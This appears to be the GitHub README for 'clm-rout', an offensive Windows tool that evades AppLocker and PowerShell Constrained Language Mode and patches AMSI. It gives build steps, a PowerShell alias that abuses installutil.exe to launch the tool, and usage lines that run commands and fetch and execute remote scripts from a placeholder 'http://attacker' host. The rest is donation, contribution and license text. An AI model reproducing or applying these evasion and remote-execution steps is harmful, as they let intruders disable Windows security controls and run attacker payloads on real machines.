• Evade AppLocker.
• Evade CLM.
• Patch AMSI via the /pacth command switch.
• Execute command(s) via the /cmd=<cmd> command switch.
• Load and execute remotely hosted script(s) via the /url=<http(s)://foo.bar/foobar> command switch.
• Output the results of commands/scripts (supports stdout and stderr).

1. Clone/download clm-rout:

   git clone https://github.com/aress31/clm-rout

2. Build the project with Visual Studio 2022.

• (Recommended) Create an "alias":

function run {
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `
		/uninstall /logfile= /LogToConsole=false `
		/patch $Args `
		C:\users\foo\CLMRout.exe
}

• Execute command(s):

  run /cmd="hostname; whoami"

• Execute remote script(s):

  run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"

• Execute remote script(s) followed by command(s):

  run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"

If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as a lot of my personal time went into creating this project. 😪

It is easy, all you got to do is press the Sponsor button at the top of this page or alternatively click this link. 😁

Found a bug 🐛? I would love to squash it!

Please report all issues on the GitHub issues tracker.

You would like to contribute to better this project? 🤩

Please submit all PRs on the GitHub pull requests tracker.

clm-rout is distributed under the terms of the BSD 3.

See LICENSE for details.